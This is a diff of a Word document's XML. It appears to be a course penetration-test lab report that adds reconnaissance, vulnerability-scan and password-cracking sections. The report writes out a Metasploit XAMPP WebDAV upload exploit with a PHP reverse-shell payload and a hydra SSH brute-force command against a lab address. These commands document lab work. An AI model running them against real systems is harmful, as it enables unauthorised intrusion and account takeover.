@@ -4166,7 +4090,14 @@
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:t>Findings:</w:t>
+        <w:tab/>
+        <w:t>Content Management System</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: WordPress</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> hosed on Amazon cloud service</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4174,6 +4105,101 @@
         <w:pBdr>
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
         </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>Software and Services</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: CRON, ATOM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:t>Shodan search results:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45F47D01" wp14:editId="7C9DE4C4">
+            <wp:extent cx="6858000" cy="4625340"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="13" name="Picture 13" descr="Graphical user interface, text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="13" name="Picture 13" descr="Graphical user interface, text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6858000" cy="4625340"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:t>Findings:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
         <w:rPr>
           <w:b/>
         </w:rPr>
@@ -4181,11 +4207,9 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>None Significant</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4208,12 +4232,79 @@
       <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
+      <w:r>
+        <w:t>Vulnerability Scanning</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="347E8C88" wp14:editId="5E832F96">
+            <wp:extent cx="6858000" cy="5390515"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="14" name="Picture 14" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="14" name="Picture 14" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6858000" cy="5390515"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Finding:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Vulnerable varnish application vulnerable to DDOS.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
       <w:pPr>
         <w:pBdr>
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
         </w:pBdr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Version Scanning</w:t>
       </w:r>
     </w:p>
@@ -4227,7 +4318,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63EFE861" wp14:editId="1291C851">
             <wp:extent cx="6316406" cy="6057900"/>
@@ -4244,7 +4334,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4399,7 +4489,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4427,15 +4517,7 @@
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The keys.txt file holds the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ssh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> login.</w:t>
+        <w:t>The keys.txt file holds the ssh login.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4485,7 +4567,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4562,21 +4644,14 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>msfconsole</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>use exploit/windows/http/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xampp_webdav_upload_php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>use exploit/windows/http/xampp_webdav_upload_php</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -4585,13 +4660,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>set payload php/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>reverse_php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>set payload php/reverse_php</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -4639,7 +4709,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId25"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4662,7 +4732,7 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:hyperlink r:id="rId24" w:history="1">
+      <w:hyperlink r:id="rId26" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4672,13 +4742,27 @@
       </w:hyperlink>
     </w:p>
     <w:p/>
-    <w:p/>
     <w:p>
       <w:r>
         <w:t>Weak Password Cracks</w:t>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>B</w:t>
+      </w:r>
+      <w:r>
+        <w:t>rute force attack by utilizing a password crack utility and wordlist</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Command: hydra -l admin123 -P udacity.txt ssh://10.1.0.12</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:r>
         <w:rPr>
@@ -4749,7 +4833,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId27"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4787,6 +4871,17 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Exploit caused by </w:t>
+      </w:r>
+      <w:r>
+        <w:t>not having complex password policy enabled</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:pPr>
         <w:pBdr>
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
@@ -4801,8 +4896,8 @@
       <w:bookmarkEnd w:id="32"/>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId26"/>
-      <w:footerReference w:type="first" r:id="rId27"/>
+      <w:footerReference w:type="default" r:id="rId28"/>
+      <w:footerReference w:type="first" r:id="rId29"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="720" w:footer="720" w:gutter="0"/>
       <w:pgNumType w:start="0"/>
